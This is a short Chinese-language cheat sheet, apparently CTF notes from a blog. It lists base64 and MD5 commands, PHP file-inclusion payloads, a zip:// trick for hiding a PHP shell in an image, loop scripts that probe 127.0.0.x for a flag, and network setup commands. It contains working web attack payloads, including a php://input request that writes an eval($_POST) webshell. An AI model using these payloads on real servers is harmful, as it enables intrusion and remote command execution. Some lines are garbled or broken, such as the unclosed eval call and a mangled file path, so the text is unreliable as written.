Base64加解密:
ubuntu@VM-0-5-ubuntu:~$ echo iloveyou | base64
aWxvdmV5b3UK
ubuntu@VM-0-5-ubuntu:~$ echo aWxvdmV5b3UK | base64 -d
iloveyou
MD5加解密:
ubuntu@VM-0-5-ubuntu:~$ openssl
OpenSSL> md5
iloveyou #这里按三次ctrl+d
(stdin)= f25a2fc72690b780b2a14e140ef6a9e0
文件包含读取文件:
shell.php?s=system(base64_decode("ZGlyIEQ6Cg=="));
通过伪协议读取文件:php://filter/convert.base64-encode/resource=index.php
也可以直接利用file协议:http://127.0.0.1/test.php?file=file://C: empflag.txt
通过伪协议写文件:file.php?file=php://input 然后POST:<?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>即可生成webshell
ZIP://1.png%231.php #把1.php压缩为1.rar然后改后缀为1.png,然后可以通过zip协议读取压缩包里得马
把文件读取的命令全改名了。
Urllib GET、POST请求脚本:
POST:
#-*- coding:utf-8 -*- #09.urllib2_post.py import urllib import urllib2 #POST请求的目标URL for i in range(1,255): url = "http://127.0.0.{1}/1.php".format(str(i)) headers = {"User-Agent":"Mozilla...."} formate = { "f":"flag", } data = urllib.urlencode(formate) request = urllib2.Request(url, data=data, headers = headers) response = urllib2.urlopen(request) print(response.read())
GET:
#!/usr/bin/env python # encoding: utf-8 import urllib import urllib2 for i in range(1,255): url = "http://127.0.0.{0}/1.php".format(str(i)) request = urllib2.Request(url=url) response =urllib2.urlopen(request,timeout=20) result = unicode(response.read()) print result
设置IP和掩码
ifconfig eth0 192.168.5.40 netmask 255.255.255.0
设置网关
route add default gw 192.168.5.1
如果你觉得这篇文章对你有用你可以通过扫描下面的二维码进行打赏。
——>微信<—— ——>支付宝<——
